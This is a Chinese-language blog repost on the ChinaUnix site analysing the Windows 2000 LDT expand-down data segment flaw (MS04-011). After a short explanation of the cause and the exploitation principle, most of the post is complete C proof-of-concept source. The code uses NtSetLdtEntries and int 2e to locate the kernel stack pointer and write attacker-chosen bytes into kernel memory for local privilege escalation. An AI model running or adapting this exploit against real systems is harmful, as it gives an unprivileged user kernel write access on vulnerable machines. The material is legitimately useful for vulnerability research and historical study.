Chinaunix首页 | 论坛 | 博客

linux乐园33662

首页 |  博文目录 |  关于我

Smv262k

  • 博客访问: 565477
  • 博文数量: 609
  • 博客积分: 4000
  • 博客等级: 上校
  • 技术积分: 4995
  • 用 户 组: 普通用户
  • 注册时间: 2008-10-17 13:59
文章分类

全部博文(609)

文章存档

2011年(1)

2008年(608)

我的朋友
最近访客
推荐博文
Windows 2000 LDT漏洞初探

分类:

2008-10-17 14:03:54


  1.漏洞原因
  z0mbie文章里提到在Win2k下进程可以自己添加LDT项,这可能是由于历史原因才留在系统代码中,因为Win2k本身并不会用到LDT.这个漏洞的核心是LDT项中Expand-Down位的设置.例子,一个LDT的Base为100,Limit为7FFFFFFF.当Expand-Down位为0时.LDT的有效范围是: 100 ~ 7FFFFFFF.
  但当Expand-Down位为1时,有效范围是: 80000000 ~ FFFFFFFF 和 0 ~ FF,及刚好相反.在Win2k添加LDT项的检测过程没有考虑这一情况,导致用户可以建立包含内核空间在内的LDT项(这其实只是一方面,GDT[23]本来就是0-FFFFFFFF,关键是我们可以控制LDT的基址,而内核有时假设基址为0,这样能使其在处理内存时发生计算误差).
  
  2.利用原理
  因为Win2k是基于页的内存保护机制,而我们又运行在ring3态下这一事实,所以需要借助内核本身来进行越权操作.eEye的文中提到int 2e中的rep movsd指令.int 2e的使用方法:
  
  mov eax, service_id
  lea edx, service_param
  int 2e
  
  当运行rep movsd指令时:
  
  edi为内核堆栈指针(KSP, 我机子上一般是FDxxxxxx)
  esi指向service_param
  ecx为参数的个数(in 32bit)
  
  相当于memcpy (es.base+edi, ds.base+esi, ecx*4);
  
  这里service_param的内容,es寄存器都是可控的.唯一不确定的是edi及内核堆栈指针.获得KSP一种方法是,先假设一个大约值,比如FD000000,再分配一较大内存空间(16MB)buf,利用这个漏洞将一特征码写入buf,最后找出特征码在buf中的偏移量offset,计算出:
  
  KSP精确值 = 假设值(FD000000) + offset.
  
  至于提升权限的部分,还没找到比较通用的方法.eEye说加LDT,但LDT的地址在KSP下方,没理解.IDT, GDT也在KSP下方.我能想到就是改Driver Dispatch Routies,通过I/O API调用.因为不是很通用这里就不列了.如果有什么好的方法,请告诉我.谢谢.
  
  3.具体步骤
  
  见代码.另外Win2k的代码也有了,可以和eEye的公告对照着看.
  
  
  /***********************************************************
  * 计算出Kernel Stack Pointer后,就能精确控制写入的地址了.
  * 要注意的是只能覆写到KSP以上的内核空间.
  ***********************************************************/
  
  /******************************************************************
  * Expand-Down Data Segment Local Privilege Escalation
  * [MS04-011]
  *
  * Bug found by: Derek Soeder
  * Author: mslug (a1476854@hotmail.com), All rights reserved.
  *
  * Version: PoC 0.1
  *
  * Tested: Win2k pro en sp4
  *
  * Thanks: z0mbie's article :)
  *
  * Compile: cl winldt.c
  *
  * Date:  18 Apr 2004
  *******************************************************************/
  
  
  #include
  #include
  #include
  
  #if 1
    #define KernelStackPtr 0xFD000000 //估计值
    #define BedSize     0x01000000
  #else
    #define KernelStackPtr 0xF0000000
    #define BedSize     0x10000000
  #endif
  
  unsigned char bed[BedSize];
  unsigned char pin[]="COOL";
  
  int (*NtSetLdtEntries)(DWORD, DWORD, DWORD, DWORD, DWORD, DWORD);
  
  WORD SetupLDT(WORD seg, DWORD ldtbase);
  
  unsigned long patch_to;
  
  int main(int argc, char *argv[])
  {
    DWORD ldtbase, KSP;
    int i;
    HMODULE hNtdll;
   
    if(argc<2) {
     printf("** coded by mslug@safechina.net **\n");
     printf("winldt.exe \n");
     return 0;
    }
  
    patch_to = strtoul(argv[1], 0, 16);
   
    hNtdll = LoadLibrary("ntdll.dll");
   
    (DWORD*)NtSetLdtEntries = (DWORD*)GetProcAddress(hNtdll, "NtSetLdtEntries");
   
    memset(bed, 'A', BedSize);
    bed[BedSize-1]=0;
   
    ldtbase = (DWORD) &bed[0] - KernelStackPtr;
   
    printf("[+] User-land bed : 0x%08X\n", &bed[0]);
    printf("[+] 1st LDT base : 0x%08X\n", ldtbase);
  
    SetupLDT(0x1f, ldtbase);
    __asm {
     push es
     push 1fh
     pop es
     mov eax, 11h   //1 param
     lea edx, pin
     int 2eh  
     pop es
    }
  
    for (KSP=0, i=0; i     if (bed[i] =='C' && bed[i+1]=='O' &&
       bed[i+2]=='O' && bed[i+3]=='L' )
     {
       KSP = KernelStackPtr + i;
       printf("[!] Knl stack ptr : 0x%08X\n", KSP);
       //KSP = (DWORD)&bed[i]-ldtbase;
       //printf("[!] Knl stack ptr : 0x%08X\n", KSP);
       break;
     }
    }
   
    if(!KSP) {
     printf("[-] Can't locate Kernel stack pointer, try again\n");
     return 0;
    } else if (patch_to < KSP) {
     printf("[-] Can only patch kernel above KSP\n");
     return 0;
    }
   
    ldtbase = patch_to - KSP;
  
    printf("[+] Patch to   : 0x%08X\n", patch_to);
    printf("[+] 2nd LDT base : 0x%08X\n", ldtbase);
  
    SetupLDT(0x17, ldtbase);
    __asm {
     push es
     push 17h
     pop es
     mov eax, 11h
     lea edx, pin
     int 2eh  
     pop es
    }
   
    return 0;
  }
  
  WORD SetupLDT(WORD seg, DWORD ldtbase)
  {
    LDT_ENTRY EvilLdt;
    DWORD base = ldtbase;
    DWORD limit = 0;
    int ret;
   
    EvilLdt.BaseLow          = base & 0xFFFF;
    EvilLdt.HighWord.Bytes.BaseMid  = base >> 16;
    EvilLdt.HighWord.Bytes.BaseHi   = base >> 24;
    EvilLdt.LimitLow         = (limit >> 12) & 0xFFFF;
    EvilLdt.HighWord.Bits.LimitHi   = limit >> 28;
    EvilLdt.HighWord.Bits.Granularity = 1;  // 0/1, if 1, limit=(limit<<12)|FFF
    EvilLdt.HighWord.Bits.Default_Big = 1;  // 0=16bit 1=32bit
    EvilLdt.HighWord.Bits.Reserved_0 = 0;  // 0/1
    EvilLdt.HighWord.Bits.Sys     = 0;  // 0/1
    EvilLdt.HighWord.Bits.Pres    = 1;  // 0/1 (presence bit)
    EvilLdt.HighWord.Bits.Dpl     = 3;  // only 3 allowed :-(
    EvilLdt.HighWord.Bits.Type    = 23;  // [16..27]
  
    ret = NtSetLdtEntries( seg,
            *(DWORD*)&EvilLdt,
            *(((DWORD*)&EvilLdt)+1),
            0,0,0);
    if (ret < 0) {
     printf("[-] Set ldt error : %08X.\n", ret);
     exit(0);
    }
  
    return seg;
  }
【责编:admin】

--------------------next---------------------

阅读(329) | 评论(0) | 转发(0) |
0

上一篇:系统安全问题:黑客可能利用新TCP漏洞

下一篇:Windows XP系统漏洞

给主人留下些什么吧!~~
关于我们 | 关于IT168 | 联系方式 | 广告合作 | 法律声明 | 免费注册

Copyright 2001-2010 ChinaUnix.net All Rights Reserved 北京皓辰网域网络信息技术有限公司. 版权所有

感谢所有关心和支持过ChinaUnix的朋友们

16024965号-6